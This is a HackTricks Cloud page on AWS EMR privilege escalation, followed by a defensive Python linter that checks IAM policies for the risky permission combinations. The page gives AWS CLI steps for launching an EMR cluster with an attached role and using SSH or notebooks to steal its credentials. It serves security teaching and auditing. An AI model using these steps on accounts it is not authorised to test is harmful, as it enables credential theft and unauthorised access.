AWS - EMR Privesc
tip
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
EMR
More info about EMR in:
iam:PassRole, elasticmapreduce:RunJobFlow
An attacker with these permissions can run a new EMR cluster attaching EC2 roles and try to steal its credentials.
Note that in order to do this you need to know some ssh private key imported in the account, or to import one, and be able to open port 22 in the master node (you might be able to do this with the attributes EmrManagedMasterSecurityGroup and/or ServiceAccessSecurityGroup inside --ec2-attributes).
# Import EC2 ssh key (you will need extra permissions for this)
ssh-keygen -b 2048 -t rsa -f /tmp/sshkey -q -N ""
chmod 400 /tmp/sshkey
base64 /tmp/sshkey.pub > /tmp/pub.key
aws ec2 import-key-pair \
--key-name "privesc" \
--public-key-material file:///tmp/pub.key
aws emr create-cluster \
--release-label emr-5.15.0 \
--instance-type m4.large \
--instance-count 1 \
--service-role EMR_DefaultRole \
--ec2-attributes InstanceProfile=EMR_EC2_DefaultRole,KeyName=privesc
# Wait 1 min and connect via ssh to an EC2 instance of the cluster
aws emr describe-cluster --cluster-id <id>
# In MasterPublicDnsName you can find the DNS to connect to the master instance
## You can also get this info listing EC2 instances
Note how the EMR role is specified in --service-role and the ec2 role is specified in --ec2-attributes inside InstanceProfile. However, this technique only allows stealing the EC2 role credentials (as you will connect via ssh) but not the EMR IAM Role.
Potential Impact: Privesc to the EC2 service role specified.
elasticmapreduce:CreateEditor, iam:ListRoles, elasticmapreduce:ListClusters, iam:PassRole, elasticmapreduce:DescribeEditor, elasticmapreduce:OpenEditorInConsole
With these permissions, an attacker can go to the AWS console, create a Notebook and access it to steal the IAM Role.
caution
Even if you attach an IAM role to the notebook instance, in my tests I noticed that I was able to steal AWS managed credentials and not credentials related to the IAM role.
Potential Impact: Privesc to the AWS managed role arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile
elasticmapreduce:OpenEditorInConsole
With just this permission, an attacker will be able to access the Jupyter Notebook and steal the IAM role associated with it.
The URL of the notebook is https://<notebook-id>.emrnotebooks-prod.eu-west-1.amazonaws.com/<notebook-id>/lab/
caution
Even if you attach an IAM role to the notebook instance, in my tests I noticed that I was able to steal AWS managed credentials and not credentials related to the IAM role.
Potential Impact: Privesc to the AWS managed role arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile
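As a defensive counterpart to the three permission combinations described on this page, here is an added example (not part of the original page) in Python: a small linter that takes an IAM policy document and reports which of the EMR privilege-escalation combinations it grants, and whether iam:PassRole is allowed on every role without any Condition. The sample policies, the account id 123456789012 and the role names are constructed for this example; `iam:PassedToService` is a real IAM condition key.

```python
import fnmatch

# Permission combinations described on this page; each set together allows
# escalation to an EMR-related role.
EMR_PRIVESC_COMBOS = {
    "emr-cluster-ec2-role": {"iam:PassRole", "elasticmapreduce:RunJobFlow"},
    "emr-notebook-create": {
        "elasticmapreduce:CreateEditor", "iam:ListRoles",
        "elasticmapreduce:ListClusters", "iam:PassRole",
        "elasticmapreduce:DescribeEditor",
        "elasticmapreduce:OpenEditorInConsole",
    },
    "emr-notebook-open": {"elasticmapreduce:OpenEditorInConsole"},
}


def _as_list(value):
    """IAM allows a string or a list in Action/Resource/Statement; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def collect_actions(policy):
    """Return (allow_patterns, deny_patterns) from all statements of a policy document."""
    allow, deny = set(), set()
    for stmt in _as_list(policy.get("Statement")):
        target = allow if stmt.get("Effect") == "Allow" else deny
        target.update(_as_list(stmt.get("Action")))
    return allow, deny


def action_granted(action, allow_patterns, deny_patterns):
    """IAM action names match case-insensitively with '*'/'?' wildcards; explicit Deny wins."""
    name = action.lower()
    if any(fnmatch.fnmatchcase(name, p.lower()) for p in deny_patterns):
        return False
    return any(fnmatch.fnmatchcase(name, p.lower()) for p in allow_patterns)


def passrole_unconstrained(policy):
    """True if an Allow statement grants iam:PassRole on Resource '*' with no Condition."""
    for stmt in _as_list(policy.get("Statement")):
        if stmt.get("Effect") != "Allow":
            continue
        patterns = [a.lower() for a in _as_list(stmt.get("Action"))]
        if not any(fnmatch.fnmatchcase("iam:passrole", p) for p in patterns):
            continue
        if "*" in _as_list(stmt.get("Resource")) and not stmt.get("Condition"):
            return True
    return False


def find_emr_privesc(policy):
    """Names of the EMR privesc combinations fully granted by the policy, sorted."""
    allow, deny = collect_actions(policy)
    return sorted(name for name, needed in EMR_PRIVESC_COMBOS.items()
                  if all(action_granted(a, allow, deny) for a in needed))


# Constructed sample policies (not from any real account).
POLICY_BROAD = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": "iam:PassRole", "Resource": "*"},
    {"Effect": "Allow", "Action": ["elasticmapreduce:*", "iam:ListRoles"], "Resource": "*"},
]}

POLICY_SCOPED = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": "iam:PassRole",
     "Resource": "arn:aws:iam::123456789012:role/EMR_EC2_DefaultRole",
     "Condition": {"StringEquals": {"iam:PassedToService": "ec2.amazonaws.com"}}},
    {"Effect": "Allow", "Action": ["elasticmapreduce:RunJobFlow",
                                   "elasticmapreduce:ListClusters",
                                   "elasticmapreduce:DescribeCluster"], "Resource": "*"},
    {"Effect": "Deny", "Action": "elasticmapreduce:OpenEditorInConsole", "Resource": "*"},
]}

POLICY_READONLY = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": ["elasticmapreduce:ListClusters",
                                   "elasticmapreduce:DescribeCluster"], "Resource": "*"},
]}

if __name__ == "__main__":
    for label, pol in [("broad", POLICY_BROAD), ("scoped", POLICY_SCOPED), ("readonly", POLICY_READONLY)]:
        print(label, find_emr_privesc(pol), "unconstrained PassRole:", passrole_unconstrained(pol))
```

The scoped policy is still reported for the cluster combination: PassRole limited to EMR_EC2_DefaultRole plus RunJobFlow is exactly what the first section needs, so the finding is a prompt to review who holds it rather than a false positive. Feed the linter the JSON returned by `aws iam get-policy-version` for the policies attached to your principals to find PassRole grants that need a Resource and Condition, and notebook permissions that can be removed.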